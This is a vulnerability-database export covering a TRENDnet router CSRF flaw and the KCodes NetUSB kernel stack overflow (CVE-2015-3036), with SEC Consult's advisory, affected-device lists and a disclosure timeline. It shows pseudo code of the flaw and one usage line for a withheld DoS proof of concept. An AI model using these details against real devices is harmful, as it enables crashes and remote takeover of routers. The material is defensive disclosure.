"https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2013-3098", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 6.8, "id": "CNVD-2013-11063", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "LOW", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-63100", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2013-3098", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2013-3098", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2013-11063", "trust": 0.6, "value": "LOW" }, { "author": "CNNVD", "id": "CNNVD-201307-631", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-63100", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11063" }, { "db": "VULHUB", "id": "VHN-63100" }, { "db": "JVNDB", "id": "JVNDB-2013-005988" }, { "db": "CNNVD", "id": "CNNVD-201307-631" }, { "db": "NVD", "id": "CVE-2013-3098" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple cross-site request forgery (CSRF) vulnerabilities in TRENDnet TEW-812DRU router with firmware before 1.0.9.0 allow remote attackers to hijack the authentication of administrators for requests that (1) change admin credentials in a request to setSysAdm.cgi, (2) enable remote management or (3) enable port forwarding in an Apply action to uapply.cgi, or (4) have unspecified impact via a request to setNTP.cgi. NOTE: some of these details are obtained from third party information. The Trendnet TEW-812DRU is a dual-band Gigabit router device. Trendnet TEW-812DRU is prone to a cross-site request-forgery vulnerability. \nAttackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device. A cross-site request forgery vulnerability exists in the TRENDnet TEW-812DRU router with firmware version 1.0.8.0", "sources": [ { "db": "NVD", "id": "CVE-2013-3098" }, { "db": "JVNDB", "id": "JVNDB-2013-005988" }, { "db": "CNVD", "id": "CNVD-2013-11063" }, { "db": "BID", "id": "61490" }, { "db": "VULHUB", "id": "VHN-63100" } ], "trust": 2.52 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-63100", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-63100" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-3098", "trust": 3.4 }, { "db": "OSVDB", "id": "95803", "trust": 2.5 }, { "db": "SECUNIA", "id": "54310", "trust": 1.7 }, { "db": "BID", "id": "61490", "trust": 1.6 }, { "db": "JVNDB", "id": "JVNDB-2013-005988", "trust": 0.8 }, { "db": "EXPLOIT-DB", "id": "27177", "trust": 0.7 }, { "db": "CNNVD", "id": "CNNVD-201307-631", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2013-11063", "trust": 0.6 }, { "db": "SEEBUG", "id": "SSVID-80796", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-63100", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11063" }, { "db": "VULHUB", "id": "VHN-63100" }, { "db": "BID", "id": "61490" }, { "db": "JVNDB", "id": "JVNDB-2013-005988" }, { "db": "CNNVD", "id": "CNNVD-201307-631" }, { "db": "NVD", "id": "CVE-2013-3098" } ] }, "id": "VAR-201402-0099", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2013-11063" }, { "db": "VULHUB", "id": "VHN-63100" } ], "trust": 1.15192307 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11063" } ] }, "last_update_date": "2024-08-14T15:24:47.014000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "TEW-812DRU", "trust": 0.8, "url": "http://www.trendnet.com/products/proddetail.asp?prod=105_TEW-812DRU" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-005988" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-352", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-63100" }, { "db": "JVNDB", "id": "JVNDB-2013-005988" }, { "db": "NVD", "id": "CVE-2013-3098" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "http://osvdb.org/95803" }, { "trust": 1.7, "url": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html" }, { "trust": 1.7, "url": "http://securityevaluators.com/content/case-studies/routers/vulnerability_catalog.pdf" }, { "trust": 1.7, "url": "http://securityevaluators.com/knowledge/case_studies/routers/trendnet_tew-812dru.php" }, { "trust": 1.7, "url": "http://secunia.com/advisories/54310" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3098" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-3098" }, { "trust": 0.8, "url": "http://securityevaluators.com/knowledge/case_studies/routers/vulnerability_catalog.pdf" }, { "trust": 0.6, "url": "http://www.exploit-db.com/exploits/27177/" }, { "trust": 0.6, "url": "http://www.securityfocus.com/bid/61490" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11063" }, { "db": "VULHUB", "id": "VHN-63100" }, { "db": "JVNDB", "id": "JVNDB-2013-005988" }, { "db": "CNNVD", "id": "CNNVD-201307-631" }, { "db": "NVD", "id": "CVE-2013-3098" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2013-11063" }, { "db": "VULHUB", "id": "VHN-63100" }, { "db": "BID", "id": "61490" }, { "db": "JVNDB", "id": "JVNDB-2013-005988" }, { "db": "CNNVD", "id": "CNNVD-201307-631" }, { "db": "NVD", "id": "CVE-2013-3098" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-07-31T00:00:00", "db": "CNVD", "id": "CNVD-2013-11063" }, { "date": "2014-02-04T00:00:00", "db": "VULHUB", "id": "VHN-63100" }, { "date": "2013-07-28T00:00:00", "db": "BID", "id": "61490" }, { "date": "2014-02-06T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-005988" }, { "date": "2013-07-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-631" }, { "date": "2014-02-04T21:55:05.107000", "db": "NVD", "id": "CVE-2013-3098" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-07-31T00:00:00", "db": "CNVD", "id": "CNVD-2013-11063" }, { "date": "2014-02-05T00:00:00", "db": "VULHUB", "id": "VHN-63100" }, { "date": "2013-07-28T00:00:00", "db": "BID", "id": "61490" }, { "date": "2014-02-06T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-005988" }, { "date": "2013-08-01T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-631" }, { "date": "2014-02-05T14:19:57.430000", "db": "NVD", "id": "CVE-2013-3098" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201307-631" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Trendnet TEW-812DRU Cross-Site Request Forgery Vulnerability", "sources": [ { "db": "CNVD", "id": "CNVD-2013-11063" }, { "db": "CNNVD", "id": "CNNVD-201307-631" } ], "trust": 1.2 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "cross-site request forgery", "sources": [ { "db": "CNNVD", "id": "CNNVD-201307-631" } ], "trust": 0.6 } }
var-201505-0408
Vulnerability from variot
Stack-based buffer overflow in the run_init_sbus function in the KCodes NetUSB module for the Linux kernel, as used in certain NETGEAR products, TP-LINK products, and other products, allows remote attackers to execute arbitrary code by providing a long computer name in a session on TCP port 20005. KCodes NetUSB is vulnerable to a buffer overflow via the network that may result in a denial of service or code execution. KCodes NetUSB The kernel driver contains a buffer overflow vulnerability. KCodes NetUSB Is Linux Connected to base embedded devices (home router products, etc.) USB Share devices on the network "USB over IP" To realize the function, Linux Kernel module. Buffer overflow (CWE-120) - CVE-2015-3036 http://cwe.mitre.org/data/definitions/120.html The client NetUSB The data to send when connecting to the server NetUSB A buffer overflow can occur because the kernel driver does not validate properly. For more information SEC Consult Please check the advisory for. SEC Consult Vulnerability Lab Security Advisory < 20150519-0 > https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt In addition, National Vulnerability Database (NVD) Then CWE-119 It is published as CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer ( Buffer error ) http://cwe.mitre.org/data/definitions/119.htmlAn attacker on the local network caused a buffer overflow, resulting in a denial of service operation (DoS) An attacker may be able to attack or execute arbitrary code. Depending on the default settings of the device, a remote attack may be possible. KCodes NetUSB is prone to a buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition. SEC Consult Vulnerability Lab Security Advisory < 20150519-0 > ======================================================================= title: Kernel Stack Buffer Overflow product: KCodes NetUSB vulnerable version: see Vulnerable / tested versions fixed version: see Solution CVE number: CVE-2015-3036, VU#177092 impact: Critical homepage: http://www.kcodes.com/ found: 2015-02-23 by: Stefan Viehböck (Office Vienna) SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
"The world's premier technology provider of mobile printing, audio and video communication, file sharing, and USB applications for iPhones, iPads, smart phones and tablets (Android and Windows), MacBooks, and Ultrabooks."
Source: http://www.kcodes.com/
Vulnerability overview/description:
NetUSB suffers from a remotely exploitable kernel stack buffer overflow. Because of insufficient input validation, an overly long computer name can be used to overflow the "computer name" kernel stack buffer. This results in memory corruption which can be turned into arbitrary remote code execution.
Furthermore, a more detailed summary of this advisory has been published at our blog: http://blog.sec-consult.com
Proof of concept:
Below is an excerpt from the vulnerable run_init_sbus() function (pseudo code):
int computername_len; char computername_buf[64]; // connection initiation, handshake len = ks_recv(sock, &computername_len, 4, 0); // ... len = ks_recv(sock, computername_buf, computername_len, 0); // boom!
A proof of concept "netusb_bof.py" has been developed which exploits the vulnerability. The PoC DoS exploit will not be published as many vendors did not patch the vulnerability yet.
Example use that results in denial-of-service (kernel memory corruption that results in a device reboot): ./netusb_bof.py 192.168.1.1 20005 500
Vulnerable / tested versions:
The vulnerability has been verified to exist in most recent firmware versions of the following devives:
TP-Link TL-WDR4300 V1 TP-Link WR1043ND v2 NETGEAR WNDR4500
Furthermore we've identified NetUSB in the most recent firmware version of the following products (list is not necessarily complete!): D-Link DIR-615 C NETGEAR AC1450 NETGEAR CENTRIA (WNDR4700/4720) NETGEAR D6100 NETGEAR D6200 NETGEAR D6300 NETGEAR D6400 NETGEAR DC112A NETGEAR DC112A (Zain) NETGEAR DGND4000 NETGEAR EX6200 NETGEAR EX7000 NETGEAR JNR3000 NETGEAR JNR3210 NETGEAR JR6150 NETGEAR LG6100D NETGEAR PR2000 NETGEAR R6050 NETGEAR R6100 NETGEAR R6200 NETGEAR R6200v2 NETGEAR R6220 NETGEAR R6250 NETGEAR R6300v1 NETGEAR R6300v2 NETGEAR R6700 NETGEAR R7000 NETGEAR R7500 NETGEAR R7900 NETGEAR R8000 NETGEAR WN3500RP NETGEAR WNDR3700v5 NETGEAR WNDR4300 NETGEAR WNDR4300v2 NETGEAR WNDR4500 NETGEAR WNDR4500v2 NETGEAR WNDR4500v3 NETGEAR XAU2511 NETGEAR XAUB2511 TP-LINK Archer C2 V1.0 (Fix planned before 2015/05/22) TP-LINK Archer C20 V1.0 (Not affected) TP-LINK Archer C20i V1.0 (Fix planned before 2015/05/25) TP-LINK Archer C5 V1.2 (Fix planned before 2015/05/22) TP-LINK Archer C5 V2.0 (Fix planned before 2015/05/30) TP-LINK Archer C7 V1.0 (Fix planned before 2015/05/30) TP-LINK Archer C7 V2.0 (Fix already released) TP-LINK Archer C8 V1.0 (Fix planned before 2015/05/30) TP-LINK Archer C9 V1.0 (Fix planned before 2015/05/22) TP-LINK Archer D2 V1.0 (Fix planned before 2015/05/22) TP-LINK Archer D5 V1.0 (Fix planned before 2015/05/25) TP-LINK Archer D7 V1.0 (Fix planned before 2015/05/25) TP-LINK Archer D7B V1.0 (Fix planned before 2015/05/31) TP-LINK Archer D9 V1.0 (Fix planned before 2015/05/25) TP-LINK Archer VR200v V1.0 (Fix already released) TP-LINK TD-VG3511 V1.0 (End-Of-Life) TP-LINK TD-VG3631 V1.0 (Fix planned before 2015/05/30) TP-LINK TD-VG3631 V1.0 (Fix planned before 2015/05/31) TP-LINK TD-W1042ND V1.0 (End-Of-Life) TP-LINK TD-W1043ND V1.0 (End-Of-Life) TP-LINK TD-W8968 V1.0 (Fix planned before 2015/05/30) TP-LINK TD-W8968 V2.0 (Fix planned before 2015/05/30) TP-LINK TD-W8968 V3.0 (Fix planned before 2015/05/25) TP-LINK TD-W8970 V1.0 (Fix planned before 2015/05/30) TP-LINK TD-W8970 V3.0 (Fix already released) TP-LINK TD-W8970B V1.0 (Fix planned before 2015/05/30) TP-LINK TD-W8980 V3.0 (Fix planned before 2015/05/25) TP-LINK TD-W8980B V1.0 (Fix planned before 2015/05/30) TP-LINK TD-W9980 V1.0 (Fix already released) TP-LINK TD-W9980B V1.0 (Fix planned before 2015/05/30) TP-LINK TD-WDR4900 V1.0 (End-Of-Life) TP-LINK TL-WR1043ND V2.0 (Fix planned before 2015/05/30) TP-LINK TL-WR1043ND V3.0 (Fix planned before 2015/05/30) TP-LINK TL-WR1045ND V2.0 (Fix planned before 2015/05/30) TP-LINK TL-WR3500 V1.0 (Fix planned before 2015/05/22) TP-LINK TL-WR3600 V1.0 (Fix planned before 2015/05/22) TP-LINK TL-WR4300 V1.0 (Fix planned before 2015/05/22) TP-LINK TL-WR842ND V2.0 (Fix planned before 2015/05/30) TP-LINK TL-WR842ND V1.0 (End-Of-Life) TP-LINK TX-VG1530(GPON) V1.0 (Fix planned before 2015/05/31) Trendnet TE100-MFP1 (v1.0R) Trendnet TEW-632BRP (A1.0R) Trendnet TEW-632BRP (A1.1R/A1.2R) Trendnet TEW-632BRP (A1.1R/A1.2R/A1.3R) Trendnet TEW-634GRU (v1.0R) Trendnet TEW-652BRP (V1.0R) Trendnet TEW-673GRU (v1.0R) Trendnet TEW-811DRU (v1.0R) Trendnet TEW-812DRU (v1.0R) Trendnet TEW-812DRU (v2.xR) Trendnet TEW-813DRU (v1.0R) Trendnet TEW-818DRU (v1.0R) Trendnet TEW-823DRU (v1.0R) Trendnet TEW-MFP1 (v1.0R) Zyxel NBG-419N v2 Zyxel NBG4615 v2 Zyxel NBG5615 Zyxel NBG5715
Based on information embedded in KCodes drivers we believe the following vendors are affected: Allnet Ambir Technology AMIT Asante Atlantis Corega Digitus D-Link EDIMAX Encore Electronics Engenius Etop Hardlink Hawking IOGEAR LevelOne Longshine NETGEAR PCI PROLiNK Sitecom Taifa TP-LINK TRENDnet Western Digital ZyXEL
Vendor contact timeline:
2015-02-28: Contacting vendor through support@kcodes.com 2015-03-04: No response, contacting various KCodes addresses found on the web. 2015-03-05: Vendor responds, requests more information. 2015-03-05: Providing advisory and proof of concept exploit. 2015-03-16: No response, requesting status update. 2015-03-16: Vendor responds, asks about fix verification(?) 2015-03-16: Requesting clarification about fixing status and information about next steps. Proposing conference call dates. 2015-03-19: No response, informing that notification of CERT/CC and selected vendors will start shortly. Requesting clarification about fixing status and information about next steps again. 2015-03-19: Vendor responds, confirms conference call date (2015-03-25). No further information provided. 2015-03-19: Providing advisory and proof of concept exploit to TP-LINK and NETGEAR. 2015-03-25: Vendor cancels conference call on short notice (sudden week-long business trip). 2015-03-26: Asking for support of CERT/CC regarding vendor coordination. 2015-03 - 2015-05: Coordination between CERT & vendors, NETGEAR and TP-LINK 2015-05-13: Notifying German CERT-Bund and Austrian CERT.at 2015-05-19: Coordinated release of security advisory
Solution:
TP-LINK has started releasing fixed firmware. The status of affected products can be found in the affected product list above.
For additional information also see CERT/CC vulnerability notice: http://www.kb.cert.org/vuls/id/177092
Workaround:
Sometimes NetUSB can be disabled via the web interface, but at least on NETGEAR devices this does not mitigate the vulnerability. NETGEAR told us, that there is no workaround available, the TCP port can't be firewalled nor is there a way to disable the service on their devices. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult
EOF Stefan Viehböck / @2015
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "netusb", "scope": "eq", "trust": 1.6, "vendor": "kcodes", "version": null }, { "_id": null, "model": "tew-632brp", "scope": null, "trust": 1.2, "vendor": "trendnet", "version": null }, { "_id": null, "model": null, "scope": null, "trust": 0.8, "vendor": "d link", "version": null }, { "_id": null, "model": null, "scope": null, "trust": 0.8, "vendor": "kcodes", "version": null }, { "_id": null, "model": null, "scope": null, "trust": 0.8, "vendor": "netgear", "version": null }, { "_id": null, "model": null, "scope": null, "trust": 0.8, "vendor": "tp link", "version": null }, { "_id": null, "model": null, "scope": null, "trust": 0.8, "vendor": "trendnet", "version": null }, { "_id": null, "model": null, "scope": null, "trust": 0.8, "vendor": "zyxel", "version": null }, { "_id": null, "model": "", "scope": null, "trust": 0.8, "vendor": "multiple vendors", "version": null }, { "_id": null, "model": "tew-812dru", "scope": null, "trust": 0.6, "vendor": "trendnet", "version": null }, { "_id": null, "model": "nbg5715", "scope": "eq", "trust": 0.3, "vendor": "zyxel", "version": "0" }, { "_id": null, "model": "nbg5615", "scope": "eq", "trust": 0.3, "vendor": "zyxel", "version": "0" }, { "_id": null, "model": "nbg4615", "scope": "eq", "trust": 0.3, "vendor": "zyxel", "version": "v2" }, { "_id": null, "model": "nbg-419n", "scope": "eq", "trust": 0.3, "vendor": "zyxel", "version": "v20" }, { "_id": null, "model": "tew-mfp1", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "_id": null, "model": "tew-823dru", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "_id": null, "model": "tew-818dru", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "_id": null, "model": "tew-813dru", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "_id": null, "model": "tew-811dru", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "_id": null, "model": "tew-673gru", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "_id": null, "model": "tew-652brp", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "_id": null, "model": "tew-634gru", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "_id": null, "model": "te100-mfp1", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "_id": null, "model": "tx-vg1530", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "tl-wr842nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "2.0" }, { "_id": null, "model": "tl-wr842nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "tl-wr4300", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "tl-wr3600", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "tl-wr3500", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "tl-wr1045nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "2.0" }, { "_id": null, "model": "tl-wr1043nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "3.0" }, { "_id": null, "model": "tl-wr1043nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "2.0" }, { "_id": null, "model": "td-wdr4900", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "td-w9980b", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "td-w9980", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "td-w8980b", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "td-w8980", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "3.0" }, { "_id": null, "model": "td-w8970b", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "td-w8970", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "3.0" }, { "_id": null, "model": "td-w8970", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "td-w8968", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "3.0" }, { "_id": null, "model": "td-w8968", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "2.0" }, { "_id": null, "model": "td-w8968", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "td-w1043nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "td-w1042nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "td-vg3631", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "td-vg3511", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "archer vr200v", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "archer d9", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "archer d7b", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "archer d7", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "archer d5", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "archer d2", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "archer c7", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "archer c5", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "2.0" }, { "_id": null, "model": "archer c20i", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "archer c2", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "_id": null, "model": "xaub2511", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "xau2511", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "wndr4500v3", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "wndr4500v2", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "wndr4500", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "wndr4300v2", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "wndr4300", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "wndr3700v5", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "wn3500rp", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "r8000", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "r7900", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "r7500", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "r7000", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "r6700", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "r6300v2", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "r6300v1", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "r6250", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "r6220", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "r6200v2", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "r6200", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "r6100", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "r6050", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "pr2000", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "lg6100d", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "jr6150", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "jnr3000", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "ex7000", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "ex6200", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "dgnd4000", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "dc112a", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "d6400", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "d6300", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "d6200", "scope": "eq", 